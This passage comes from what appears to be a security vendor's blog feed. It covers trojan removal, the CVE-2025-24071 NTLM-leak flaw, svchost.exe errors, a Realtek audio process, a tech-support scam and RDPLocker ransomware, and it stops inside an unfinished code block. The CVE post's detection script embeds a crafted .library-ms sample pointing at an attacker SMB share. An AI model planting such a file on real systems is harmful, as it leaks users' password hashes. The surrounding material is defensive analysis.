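# Flagged processes first; note the PID and Path before ending anything in Task Manager.
Get-ProcessTriage | Sort-Object { $_.Flags -eq '' }, Name | Format-Table -AutoSize -Wrap
```

Run it before you reboot into Safe Mode, because the connection column is the part Task Manager cannot show you and Safe Mode (Minimal) has no networking. Record the PID and Path of anything flagged, end the process in Task Manager, then use the recorded path in Step 3; an unsigned binary under %LOCALAPPDATA% is often a legitimate updater, so confirm before deleting.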

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of Trojan:Win32/Agent variants. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware specializes in detecting trojans like Win32/Agent that hide deep in your system. The software uses advanced scanning techniques to find malware that traditional antivirus programs miss.

[Screenshot: GridinSoft Anti-Malware main screen]

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

[Screenshot: scan results screen]

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

[Screenshot: removal finished]

How Trojan:Win32/Agent Spreads

Understanding how this malware spreads helps you avoid future infections. Agent trojans commonly arrive through these methods:

Email Attachments: Fake invoices, shipping notifications, or other business documents that contain the trojan. These emails often look legitimate but come from unknown senders.

Malicious Downloads: Free software, game cracks, or movies from untrustworthy websites. The trojan hides inside these downloads and installs silently.

Drive-by Downloads: Visiting compromised websites that exploit browser vulnerabilities. The malware downloads automatically without your knowledge.

Infected USB Drives: Plugging in infected external devices can transfer the malware to your computer. Always scan removable media before use.

Similar to other threats we’ve covered like fake virus alerts, these attacks rely on social engineering and user trust.

Prevention Tips

Preventing Trojan:Win32/Agent infections is easier than removing them. Follow these practical steps to protect your system:

Keep Software Updated: Install Windows updates and software patches promptly. Many trojans exploit known vulnerabilities that patches fix.

Use Reliable Antivirus: Install reputable antivirus software and keep it updated. Real-time protection can block trojans before they execute.

Be Careful with Downloads: Only download software from official websites. Avoid torrent sites and file-sharing platforms where malware is common.

Check Email Attachments: Never open attachments from unknown senders. Even familiar senders can have compromised accounts.

Enable Windows Defender: Don’t disable Windows Defender unless you have another reliable antivirus running.

Regular Backups: Back up important data regularly. This protects you from data loss if malware strikes.

Avoid Suspicious Links: Don’t click links in spam emails or pop-up ads. These often lead to malware download sites.

The tactics used by Agent trojans are similar to those in professional hacker email scams and other social engineering attacks.

Frequently Asked Questions

What is Trojan:Win32/Agent and why is it dangerous?

Trojan:Win32/Agent is a family of malicious programs that hide inside legitimate-looking software. They’re dangerous because they can steal your personal information, download other malware, and create backdoors for remote access. The “Agent” name covers many variants, each with different capabilities.

How did Trojan:Win32/Agent get on my computer?

Most commonly through email attachments, malicious downloads, or infected websites. The trojan disguises itself as useful software, documents, or media files. Once you run the infected file, it installs silently in the background.

Can I remove Trojan:Win32/Agent manually?

Yes, manual removal is possible using the steps in this guide. However, it requires technical knowledge and patience. Agent trojans often hide in multiple locations and can be tricky to remove completely. Automatic removal tools are usually more effective.

Is it safe to delete the files I find during manual removal?

Only delete files you’re certain are malicious. When in doubt, research the file name online or move suspicious files to a quarantine folder instead of deleting them immediately. Always backup important data before starting manual removal.

How can I prevent Trojan:Win32/Agent infections?

Keep your software updated, use reliable antivirus protection, avoid suspicious downloads, and be careful with email attachments. Don’t download software from untrusted sources, and always scan external devices before use.

What should I do if manual removal doesn’t work?

If the trojan keeps returning or you can’t find all the malicious files, use professional anti-malware software like GridinSoft Anti-Malware. These tools can detect hidden components and ensure complete removal.

Will Trojan:Win32/Agent steal my passwords and banking information?

Yes, many Agent variants are designed to steal sensitive information including passwords, banking details, and personal files. If you suspect infection, change your important passwords immediately and monitor your accounts for suspicious activity.

Can Trojan:Win32/Agent download other malware to my computer?

Absolutely. Agent trojans often serve as downloaders that fetch additional malware. This can include ransomware, cryptominers, or other trojans. Quick removal is essential to prevent further infections.

Quick Removal Summary

If you need to remove Trojan:Win32/Agent quickly, here’s what to do:

  1. Disconnect from the internet to prevent data theft
  2. Boot into Safe Mode to stop the malware from running
  3. Run a full system scan with updated antivirus software
  4. Use GridinSoft Anti-Malware for comprehensive removal
  5. Change your passwords after cleaning your system
  6. Update your software to prevent reinfection

The infection methods used by this trojan are similar to those found in HackTool:Win32/AutoKMS and other malware that comes from cracked games and software.

Remember that trojans like Win32/Agent are part of a larger ecosystem of malware. They often work alongside other threats like heuristic virus detections and various Trojan:Win32/Wacatac variants.

Related Threats

Trojan:Win32/Agent is part of a family of Windows trojans. You might also encounter:

These threats use similar infection methods and require comparable removal techniques. Understanding one helps you deal with others.

Stay vigilant and keep your security software updated. Trojans like Win32/Agent are constantly evolving, but good security practices will protect you from most threats.

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now
https://gridinsoft.com/blogs/windows-vulnerability-cve-2025-24071/
Thu, 20 Mar 2025 11:18:02 +0000

Microsoft has disclosed a critical vulnerability in Windows File Explorer, CVE-2025-24071, with a CVSS score of 7.5. It allows attackers to leak NTLM hashes, which can then be used for further attacks such as pass-the-hash or offline cracking. Microsoft has already fixed the vulnerability.

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview

Cybersecurity agencies have published information about the CVE-2025-24071 vulnerability. This is a critical vulnerability in Windows File Explorer, with a CVSS score of 7.5. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server versions. The vulnerability arises from Windows Explorer’s implicit trust and automatic parsing of .library-ms files, which are XML-based files used to define search or library locations within the operating system.

CVE-2025-24071 details (screenshot)

The core issue is that when a .library-ms file, crafted with a malicious SMB (Server Message Block) path, is embedded in a RAR or ZIP archive and subsequently extracted, Windows Explorer automatically processes it for indexing, previews, or thumbnails.

This processing triggers an SMB authentication request to the attacker-controlled server, resulting in the disclosure of the user’s NTLMv2 hash. This hash can then be used for attacks such as pass-the-hash or offline NTLM hash cracking, posing significant security risks.

Technical Details

The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in the eponymous repository, created by a malware and CTI analyst known as 0x6rss. The PoC is implemented as a Python script, designed to demonstrate the exploitation process. The PoC involves creating a specially crafted .library-ms file that includes a tag pointing to an attacker-controlled SMB server (e.g., \\192.168.1.116\shared). This file is compressed within a RAR or ZIP archive.

Contents of the .library-ms file used to reproduce the CVE-2025-24071 vulnerability (source: 0x6rss)

Upon extraction of the archive, Windows Explorer automatically initiates processing of the .library-ms file. This is observed through tools like Procmon, where processes such as Explorer.exe and SearchProtocolHost.exe perform operations like CreateFile, ReadFile, QueryBasicInformationFile, and CloseFile for indexing purposes.

The automatic processing triggers an SMB authentication handshake, captured via Wireshark with an SMB filter (smb or smb2). This includes an SMB2 Negotiate Protocol Request from the victim to the attacker server, followed by an SMB2 Session Setup Request (NTLMSSP_AUTH), which leaks the victim’s NTLMv2 hash. The key feature of this vulnerability is that no user interaction is required beyond extracting the archive, making this a zero-click exploit in certain scenarios.
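The mechanism above gives defenders a simple, file-based check: before (or right after) extracting an archive, look for .library-ms files whose library location points at a remote host. The scanner below is an added example written for this page, not code from the post or from 0x6rss's PoC. It walks a directory, parses every .library-ms file as XML and reports any element whose text is a UNC path or a file:// URL naming a host. The sample library file is constructed; its element names follow the library description format Windows uses, but the scanner matches on element text and does not depend on those names, so it also catches a variant that moves the path to another element.

```python
"""
Added example (not from the original post or the PoC): scan extracted files
for .library-ms documents that declare a remote (SMB) library location.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# A UNC path (\\host\share), its forward-slash form, or a file://host/... URL.
# A library location of this kind is what makes Explorer reach out over SMB.
REMOTE_LOCATION = re.compile(
    r"^(?:\\\\|//)(?P<host>[^\\/]+)[\\/]|^file://(?P<fhost>[^/]+)/",
    re.IGNORECASE,
)

# Constructed sample: the SMB path quoted in the write-up, placed inside a
# library description. (Python escaping: "\\\\" in the source is "\\" in the file.)
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Shared Documents</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.168.1.116\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def remote_locations(xml_data) -> list:
    """Return the text of every element that names a remote host; [] if none or not XML."""
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    try:
        root = ET.fromstring(xml_data)
    except ET.ParseError:
        return []  # not well-formed XML: nothing to flag here, but worth logging
    hits = []
    for elem in root.iter():
        text = (elem.text or "").strip()
        if text and REMOTE_LOCATION.match(text):
            hits.append(text)
    return hits


def scan_directory(path: str) -> dict:
    """Map each .library-ms file under `path` to the remote locations it declares."""
    findings = {}
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".library-ms"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hits = remote_locations(fh.read())
            if hits:
                findings[full] = hits
    return findings


def demo() -> dict:
    """Write the constructed sample into a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "Documents.library-ms"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_LIBRARY_MS)
        return {os.path.basename(k): v for k, v in scan_directory(tmp).items()}


if __name__ == "__main__":
    for file_name, locations in demo().items():
        print(f"{file_name}: remote library location(s) {locations}")
```

A hit is a reason to delete the file before Explorer indexes it, not proof of an attack by itself: a library pointing at an internal file server is legitimate. Pair the check with the network-side view described above (unexpected SMB sessions to hosts that are not your file servers) and with the patch, which is the actual fix.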

Exploitation in the Wild and Microsoft Response

Research suggests that CVE-2025-24071 is not only theoretical but actively exploited in the wild. In the aforementioned blog, the author reports that the vulnerability may have been sold on a forum by a threat actor named “Krypt0n,” known for developing EncryptHub Stealer. An X post further corroborates this, detailing how the exploit is configured on a local server (e.g., VPS) with the attacker’s IP and share, triggering hash leaks when accessed by Explorer without file opening.

Microsoft has addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month. The patch details are referenced in the Microsoft Security Update Guide. Users of vulnerable systems are advised to upgrade to an up-to-date version of the OS.

Svchost.exe Application Error
https://gridinsoft.com/blogs/svchost-exe-application-error/
Sun, 02 Mar 2025 18:11:21 +0000

Here is a comprehensive examination of the “svchost.exe – Application Error”. The analysis aims to address potential causes, mitigation strategies, and related system health, drawing from extensive research into svchost.exe functionality and reported issues.

Background on svchost.exe

Svchost.exe, or Service Host, is a core Windows process introduced in the Windows NT family to host multiple system services within a single process, enhancing resource efficiency. It loads Dynamic Link Libraries (DLLs) to run services, such as network management, Windows Update, and firewall operations. Multiple instances of svchost.exe are normal, each managing different service groups, and it is typically located at C:\Windows\System32\ or C:\Windows\SysWOW64\ for 64-bit systems. However, malware can masquerade as svchost.exe, making it crucial to verify its legitimacy.

The error message, like “The instruction at 0x00007FFD55C5A126 referenced memory at 0x0000000000000078. The memory could not be read,” indicates a memory access violation, likely due to an attempt to read an invalid or unallocated memory address (0x78 is a very low address, typically a null pointer plus a small structure offset). Such errors are commonly associated with corrupted system files, interrupted updates, or malware interference.

Game Crashes

Game-related crashes typically involve the game’s executable crashing due to issues like DirectX 12 settings or DLL conflicts.

Games can indirectly strain system resources, potentially exposing underlying issues, such as services hosted by svchost.exe failing under load. For instance, services like Windows Update or Background Intelligent Transfer Service (BITS) might malfunction, leading to errors. However, the error’s timing during gameplay suggests it may not be directly game-related but rather a system condition exacerbated by resource usage.

Potential Malware Risk from Mods and Custom Content

Mods and CC are often hosted on community sites, and malicious files can disguise themselves as legitimate downloads, potentially infecting the system. Research indicates svchost.exe errors can result from malware injecting itself into the process or corrupting system services. Given this, it’s prudent to investigate for malware, especially since the user noted downloading from potentially unverified sources.

Analyzing the Error: Common Causes and Fixes

Svchost.exe errors, particularly memory-related ones, are frequently linked to Windows Update issues. For example, interrupted or corrupted updates can cause services like Windows Update to fail, leading to crashes (see PC Hell: How to Fix SVCHOST.EXE Application Error). Other causes include:

  • Corrupted system files, which can be repaired using System File Checker (SFC).
  • Malware infections, which may require antivirus scans.
  • Resource conflicts, especially during high system load, such as gaming.

To determine the specific svchost.exe instance causing the error, the user could check the Task Manager’s Details tab, right-click the process, and view its properties for the command line (e.g., “svchost.exe -k netsvcs”), revealing the service group. However, given the error terminates the process, capturing this information may require monitoring tools or debugging, which is beyond typical user capability.
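The same mapping can be done from the command line, which is easier to capture than a Task Manager screenshot and can be scripted to run on a schedule. The script below is an added example written for this page, not code from the post: it parses the CSV output of `tasklist /svc`, groups hosted services by svchost.exe PID, answers "which instance hosts Windows Update (wuauserv)?", and lists instances that host no service at all, which is unusual for Service Host and worth checking against the expected path (C:\Windows\System32\svchost.exe). The embedded tasklist output is constructed so the parser runs on any OS; on Windows, run_tasklist() collects live data.

```python
"""
Added example (not from the original post): map svchost.exe instances to
the services they host by parsing `tasklist /svc /FO CSV`.
"""
import csv
import io
import subprocess

# Constructed sample of `tasklist /svc /FO CSV` output (not captured from a real host).
SAMPLE_TASKLIST_CSV = """\
"Image Name","PID","Services"
"System Idle Process","0","N/A"
"svchost.exe","988","BrokerInfrastructure,DcomLaunch,PlugPlay,Power,SystemEventsBroker"
"svchost.exe","1204","RpcEptMapper,RpcSs"
"svchost.exe","1412","Schedule"
"svchost.exe","2860","wuauserv"
"svchost.exe","5120","N/A"
"explorer.exe","4220","N/A"
"""


def parse_tasklist_svc(text: str) -> dict:
    """Return {pid: [service, ...]} for every svchost.exe row in tasklist CSV output."""
    hosts = {}
    for row in csv.DictReader(io.StringIO(text)):
        if row["Image Name"].lower() != "svchost.exe":
            continue
        services = row["Services"]
        hosts[int(row["PID"])] = [] if services == "N/A" else services.split(",")
    return hosts


def find_pid_for_service(hosts: dict, service: str):
    """PID of the svchost.exe instance hosting `service`, or None if it is not running."""
    for pid, services in hosts.items():
        if service.lower() in (s.lower() for s in services):
            return pid
    return None


def orphan_instances(hosts: dict) -> list:
    """svchost.exe PIDs that host no service. Service Host exists only to host
    services, so such an instance deserves a look at its path and signature
    (it may also just be a transient instance whose services already stopped)."""
    return sorted(pid for pid, services in hosts.items() if not services)


def run_tasklist() -> dict:
    """Collect live data on Windows (uses the built-in tasklist tool)."""
    out = subprocess.run(
        ["tasklist", "/svc", "/FO", "CSV"], capture_output=True, text=True, check=True
    )
    return parse_tasklist_svc(out.stdout)


if __name__ == "__main__":
    hosts = parse_tasklist_svc(SAMPLE_TASKLIST_CSV)
    for pid, services in sorted(hosts.items()):
        print(pid, ", ".join(services) or "(no services)")
    print("wuauserv is hosted by PID", find_pid_for_service(hosts, "wuauserv"))
    print("svchost.exe instances hosting no service:", orphan_instances(hosts))
```

Because the crashing instance is gone by the time you look, take the snapshot while the system is healthy and keep it; when the error appears, the Application event log entry records the faulting module, and the saved mapping tells you which service group that instance belonged to.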

Recommended Mitigation Steps

Potential Cause | Description | Action
--- | --- | ---
Malware Infection | Mods/CC downloads may introduce malicious files affecting svchost.exe. | Run a full antivirus scan; ensure downloads come from trusted sources.
Corrupted Windows Updates | Interrupted or failed updates can corrupt services hosted by svchost.exe. | Check and install updates; run SFC and DISM scans.
System File Corruption | Corrupted system files can lead to memory access errors in svchost.exe. | Run sfc /scannow to repair files; check Event Viewer for details.
Resource Conflict | High system load during gaming may expose underlying service issues. | Monitor resource usage, disable unnecessary overlays, ensure system updates.
Game-Specific Issue | Unlikely direct cause, but may coincide with system strain. | Verify game files, update the game, disable overlays.

Step 1. Run a Full Antivirus Scan

Use GridinSoft Anti-Malware to scan for malware, focusing on recently downloaded files.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.


Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.


Step 2. Check and Install Windows Updates

Navigate to Settings > Update & Security > Windows Update and install any pending updates. This addresses potential update-related errors.

If updates fail, consider manually downloading and installing critical updates from Microsoft’s update catalog.

Step 3. Run System File Checker (SFC)

Open Command Prompt as an administrator and run: sfc /scannow. This tool scans and repairs corrupted system files, potentially fixing svchost.exe errors.

If SFC finds issues, follow with DISM /Online /Cleanup-Image /RestoreHealth for deeper system repair.

Step 4. Monitor and Troubleshoot Further

Check the Event Viewer (type eventvwr in the Start menu) for errors related to svchost.exe, noting the service name for deeper investigation.

If the issue persists, consider resetting Windows Update components by stopping the Windows Update service, renaming the SoftwareDistribution folder, and restarting the service.

Step 5. Game-Specific Checks

Ensure your game is up to date via Steam or its launcher. Verify game file integrity to rule out corruption (Steam: Right-click game > Properties > Local Files > Verify integrity of game files).

Disable overlays (e.g., Steam Overlay, NVIDIA GeForce Experience) during gameplay, as they can sometimes cause system conflicts.

Conclusion

It’s worth noting that svchost.exe errors are not typically user-facing; they usually manifest as system instability rather than pop-ups. The error’s visibility might suggest an interaction between the game and a system service, possibly through resource contention or a misconfigured service.

The concern about malware is justified, as community-driven content like mods can be risky. To mitigate future risks, always download from reputable sites, such as official mod repositories, and use sandboxing tools if available to test new downloads. Regular system maintenance, including updates and scans, is also recommended to prevent such issues.

So, the svchost.exe error is likely a system-level issue, potentially exacerbated by recent downloads and not directly caused by Rise of the Tomb Raider. By following the outlined steps—antivirus scan, system updates, and file repairs—the user can address the root cause. If issues persist, further investigation via Event Viewer may be necessary. This approach ensures system health while addressing gaming-related concerns.

RtkAudUService64.exe
https://gridinsoft.com/blogs/rtkauduservice64-exe/
Tue, 18 Feb 2025 19:00:08 +0000

RtkAudUService64.exe is a process related to the operation of the Realtek audio interface. It is legitimate and handles sound effect processing in the system. Sometimes this process consumes an abnormal amount of resources, which is often due to a corrupted driver or an issue with an installed Windows update. In this post, I will explain its purpose and the steps you can take if it consumes a lot of hardware resources.

RtkAudUService64.exe Overview

RtkAudUService64.exe is a process associated with Realtek High Definition Audio, one of the most commonly used audio drivers in Windows-based systems. Realtek provides built-in audio solutions for a vast range of motherboards, laptops, and pre-built desktops.

This specific process is responsible for managing and enhancing audio playback, ensuring that features like equalization, environmental effects, and microphone noise reduction work properly. It is a legitimate system process and is generally safe to run. The executable is typically located in “C:\Program Files\Realtek\Audio\HDA” and is installed alongside the Realtek audio driver.

Realtek control center and effects window (screenshot)

While it runs in the background, it ensures smooth audio performance and provides compatibility between the Realtek Audio Console and the hardware driver itself. In most cases, users do not need to interact with this process directly, as it operates autonomously to maintain audio stability and functionality. When everything operates as intended, it causes no issues and no CPU load worth mentioning.

High CPU Usage and Troubleshooting

Some users report that RtkAudUService64.exe occasionally consumes excessive CPU resources, causing performance issues and even overheating. Normally, audio processes should not require much processing power. However, under specific circumstances, this service can use an abnormal amount of CPU. This issue is more noticeable on older or underpowered systems, especially when multiple audio enhancements are enabled. Features like noise suppression, spatial sound, or equalizers can further strain system performance.

High CPU usage by RtkAudUService64.exe (screenshot)

In the modern era of powerful CPUs, high resource usage by an audio service is abnormal and usually indicates a driver issue. Some users have reported that after a Windows update or a Realtek driver update, this process began consuming excessive CPU. In some cases, this led to system lag or increased temperatures.

To resolve this issue, the most common solution is to reinstall or update the Realtek drivers. Uninstalling the existing driver from Device Manager and letting Windows reinstall a fresh copy often resolves the problem. In some cases, rolling back to a previous system restore point before the issue started may be necessary.

Is RtkAudUService64.exe a Virus?

Foremost, RtkAudUService64.exe is not a virus. It is a legitimate process created by Realtek Semiconductor Corp., one of the leading manufacturers of onboard audio solutions. However, because it is widely recognized and commonly found in Windows systems, sometimes malware developers may disguise malicious software under a similar name to avoid detection. It’s a common practice among coin miner viruses and backdoors.


To ensure the process running on your system is legitimate, check its file location. If RtkAudUService64.exe is not in the “C:\Program Files\Realtek\Audio\HDA” directory, it may be a counterfeit process. Additionally, if you notice unexpectedly high CPU usage, system slowdowns, or other suspicious behavior, it is advisable to scan your system with reliable antivirus software. However, high CPU usage by RtkAudUService64.exe alone does not mean that you have malware.

Should I Disable/Delete the RtkAudUService64.exe?

For most users, there is no need to disable or remove RtkAudUService64.exe, as it plays a crucial role in maintaining stable audio functionality. However, there are certain situations where disabling it may be necessary. After some Windows updates, users have reported compatibility issues where the service begins causing excessive CPU usage or interfering with normal audio playback.

Similarly, some poorly optimized driver releases from Realtek have occasionally introduced performance problems. These issues may persist until a fix is provided. In such cases, temporarily disabling this process can serve as a workaround until a proper update is released.

Disabling this service, however, comes with trade-offs. All Realtek audio enhancements, including equalization, environmental effects, and noise suppression, will cease to function. Additionally, the Realtek Audio Console, which provides a user-friendly interface for adjusting audio settings, will no longer work. Some users have also reported intermittent audio dropouts every few seconds after disabling the service, though this does not happen consistently.

If disabling it becomes necessary, it can be done via Task Manager or by preventing it from starting up in Windows Services (services.msc). However, the better long-term solution is to wait for an official driver update from Realtek or the motherboard manufacturer. Removing this service permanently can lead to an inconsistent audio experience.

How to disable RtkAudUService64.exe (screenshot)

Another case where you can safely disable the RtkAudUService64.exe process is if you are not using the built-in audio device. For example, if you are using an external USB or PCI audio interface, such as one from Behringer, PreSonus, or M-Audio, you can completely disable the Realtek audio device and all related processes. This will not affect sound output or effects processing, as these are handled by the separate DAC built into the audio interface.

Windows Defender Security Center Scam
https://gridinsoft.com/blogs/windows-defender-security-center-scam/
Sat, 01 Feb 2025 09:39:19 +0000

“Windows Defender Security Center” is a scam message that comes from a fake website. This fraud is built on the inexperience and trust of Internet users. Now I will tell you how it works and how not to become a victim of it.

Windows Defender Security Center Scam Overview

“Windows Defender Security Center” is a fake malware alert that appears on various scam websites. Users often land on these pages unintentionally while browsing other websites. In certain cases, a browser hijacker may be responsible. Leading users to sketchy pages is the main purpose of such malware, and scam sites are just one more destination.

Example of the “Windows Defender Security Center” scam (screenshot)

The scheme is simple: the fake alert warns the victim that their system is infected with multiple viruses. It urges them to call a provided number, which typically connects the victim to a call center, usually in another country.

There, scammers insist that the computer is severely compromised and offer a «solution». They ask the victim to install an app that will supposedly resolve the problem. But instead of a solution, users get a potentially unwanted application (PUA). Once installed, this software runs a fake scan, detects non-existent threats, and demands payment for an “activation” that does nothing.

How Does the Windows Defender Security Center Scam Operate?

The first part of the scam takes place on a website that pretends to be a Microsoft malware alert of some kind. It is quite easy to get one opened in a background tab while browsing sketchy websites with pirated movies or games. The title of the website, Windows Defender Security Center, is what gave the scam campaign its name.

When an unsuspecting user clicks anything on that website, it extends into a fullscreen mode, and starts playing a scary AI-generated voice message. It states something along the lines of “your computer is infected and we locked it to stop the malware, contact our support immediately”. The exact text may change from one scam site to another, but the overall story is always the same.

One trick this site pulls is altering the key sequence for leaving fullscreen mode. Pressing F11 or tapping Esc does nothing, as the con artists who designed the page changed it to a long Esc press. Holding Esc is the way to get out of the scam without any calls to “tech support”.

Crooks posing as “Microsoft-certified technicians” instruct victims to grant remote access, pretending to diagnose issues. In reality, they plant additional junkware, modify system settings, and pressure users into paying for unnecessary services.

Example of a program installed by the Windows Defender Security Center scam “technicians” (screenshot)

These programs frequently display fake security warnings, convincing users that urgent action is necessary. After running a sham system scan, the software presents a long list of supposed infections. However, the “free” version conveniently cannot remove them. Apps push the victims to purchase the full version, which merely clears the list — without providing any real protection or optimization.

The program asks to buy the full version to resolve the problems (screenshot)

To make matters worse, scam websites often employ browser-locking scripts, preventing users from closing the page. PUPs are also notorious for injecting aggressive advertisements (pop-ups, banners, and in-text ads) that disrupt the browsing experience and sometimes cover legitimate website content. These ads can lead to malware-laden pages or execute drive-by downloads, silently installing additional threats. Even a single misclick can result in severe infections.

Another critical concern is data tracking. Many PUPs harvest user information, including IP addresses, search history, visited websites, and in some cases even keystrokes. The last of these, however, is characteristic of a different threat type, spyware. In any case, this data is sold to third parties, potentially leading to privacy breaches, targeted phishing attacks, or even identity theft. Some PUPs go further by mining cryptocurrency or running background processes, significantly degrading system performance.

How Do PUPs Infiltrate the System?

Many PUPs get into the computer without explicit user consent, often bundled with freeware or delivered via misleading ads. While some PUPs have official websites, most spread through deceptive methods. Developers rely on “bundling” — hiding unwanted programs inside installation packages of legitimate software.

Since many users rush through installations without reviewing options, they unknowingly allow PUPs onto their systems. These unwanted programs are often concealed within “Custom” or “Advanced” installation settings, which many users overlook. Intrusive ads also play a role, redirecting users to sites offering fake downloads or deceptive prompts, leading to unintentional PUP installations.

How to Prevent PUP Infections?

To minimize the risk of PUP infections, users must adopt cautious browsing habits. This is especially important when visiting streaming, gambling, or adult content websites. Downloading software should be done exclusively from official sources, as third-party downloaders often distribute bundled PUPs. When installing software, reviewing the “Custom” or “Advanced” settings is crucial to opting out of any hidden programs. If a browser starts redirecting unexpectedly, users should inspect and remove suspicious extensions or applications that may have been installed without their knowledge.

As I said above, scammers rely on social engineering to manipulate users into falling for their schemes. Fraudulent pop-ups often feature spelling mistakes and poor design, making them appear unprofessional. They also employ urgency tactics, such as countdown timers, to pressure users into taking immediate action.

Claims that users have won a prize, despite never entering a contest, are another red flag. Additionally, pop-ups that appear to scan a device for viruses are always fraudulent, as webpages cannot perform such actions. Finally, any pop-up offering an exclusive financial opportunity only for the user is a clear scam attempt.

While most pop-ups do not directly install malware, they can still lead to financial loss or identity theft. Sometimes they can prevent you from closing the web browser. If this happens, the only way to terminate the browser is to use Task Manager or to restart the system with the physical power button of the PC or laptop. Upon reopening the browser, avoid restoring the previous session to prevent reloading the malicious page.

Windows Defender Security Center Scam

The post Windows Defender Security Center Scam appeared first on Gridinsoft Blog.

RDPLocker Ransomware https://gridinsoft.com/blogs/rdplocker-ransomware/ Fri, 03 Jan 2025 16:15:25 +0000

The post RDPLocker Ransomware appeared first on Gridinsoft Blog.

RDPLocker is a virus that encrypts the files and demands for a ransom payment for their decryption. It was first detected on malware analysis platforms at the very beginning of 2025, and by our observations attacks both individual users and corporations.

One of the distinctive features of the malware is the changes to system wallpaper: it swaps the original one for a black background with red sign on it. The sign says “All your files are stolen and encrypted. Find readme.txt and follow the instructions”. Users will also notice all the files getting the .rdplocker extension: document.docx will become document.docx.rdplocker, song.mp3 – song.mp3.rdplocker, and so on.

Readme.txt Ransom Note Overview

The mentioned readme.txt file is a ransom note containing a basic description of what has happened and how the victim can supposedly revert the encryption. It also boasts of using intermittent encryption and describes it as something that makes the malware undetectable and enormously fast. In fact, this technique is far from new, and it is precisely what leaves room for partial recovery.

RDPLocker ransomware note

Intermittent encryption, as the name suggests, is a mode where the file is encrypted in sections rather than completely. This does speed up encryption, but it leaves long runs of plaintext in every file, and the way the sections are chosen (fixed stride, a percentage of the file, or the header only) decides how much of the content survives. Encrypting only the first megabyte of each file has become a popular variant among ransomware families, since that is enough to break the headers most programs need to open a file.

Other parts of the ransom note are fairly generic and consist of threats and promises of file recovery. The attackers demand contact within a 48-hour deadline; otherwise, they claim, they will delete the decryption key and publish the stolen data. For contact they offer a single email address: rlocked@protonmail.com

RDPLocker Ransomware Overview

RDPLocker is an example of small-batch ransomware that non-selectively targets corporations and individuals. Typical distribution channels include email spam and online scams such as fake human verification pages. Thanks to extensive packing and encoding, the sample is evasive against static analysis, so signature-based antivirus software may struggle to detect it.

Upon execution, the malware checks a selection of system characteristics to avoid running on virtual machines or under a debugger. After passing these checks, RDPLocker starts its malicious activity by stopping Microsoft Defender and disabling or deleting the basic Windows backup mechanisms.

Once done "preparing" the system, the ransomware switches to file encryption. The encryption algorithm is strong enough that brute-forcing the key is not an option. Nonetheless, there are options for free file recovery, described in the recovery section below.

The encryption process ends with dropping the ransom note into C:\Users\%username\Links and changing the wallpaper. At the same time, the malware timestamps the decryption key, so the actors can count the 48 hours from that moment.

RDPLocker wallpaper

How to Remove RDPLocker Virus?

Before any recovery attempt, remove the malware first. After finishing its encryption pass, it stays active and keeps looking for new files to cipher, so anything you recover will be encrypted again as soon as it appears on the disk.

GridinSoft Anti-Malware is a program that has you covered. Its multi-component detection system will detect and remove the ransomware regardless of how evasive it is. Download it by clicking the banner below and run a Full Scan to check the entire system.


How to restore .rdplocker files?

Despite how "cutting-edge" RDPLocker claims to be, there are several ways to recover the files. Intermittent encryption may break direct access to a file, but it leaves enough of the content untouched for recovery tools to work with.

Try opening media files (videos, music) with WinAmp. Since only certain sections of each file are encrypted, remove the ransomware extension and give it a try. Playback will skip or garble the ciphered parts, but that is better than no access at all. WinAmp suits the purpose because it does not refuse a file whose integrity is broken, which is obviously the case for the encrypted files.

Large files are often not encrypted at all. To speed up the process, ransomware may skip files over about 500 MB, only appending its extension and moving on to the next file. Archives (7z, RAR, ZIP), large videos and some MS Office documents can therefore be intact: remove the extension and open them as usual. A quick way to tell is to look at the first bytes of the file: an intact archive or document still starts with its normal signature, while an encrypted one starts with random-looking bytes.

Use file recovery tools. Depending on how the malware handles files during encryption (for instance, writing a new file and deleting the original rather than overwriting it in place), it may be possible to restore them in their pre-encryption state. Any tool of your choice will do; the key characteristic is support for as many file formats as possible. Recover onto a separate drive so that new writes do not overwrite the deleted originals.
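As an added illustration (not part of the original post and not RDPLocker's own code), the following Python script models intermittent encryption with an assumed layout (64 KiB encrypted, then 192 KiB left alone) and shows the triage a practitioner can do on a .rdplocker file before renaming it: an entropy scan over fixed windows tells how much of the file is ciphertext, and a file-signature check tells whether the header survived. The chunk sizes, the thresholds and the sample "document" are all constructed assumptions for the demonstration.

```python
"""Added example (not Gridinsoft's code): why intermittently encrypted files
are partly recoverable, and how to triage a .rdplocker file before renaming it.
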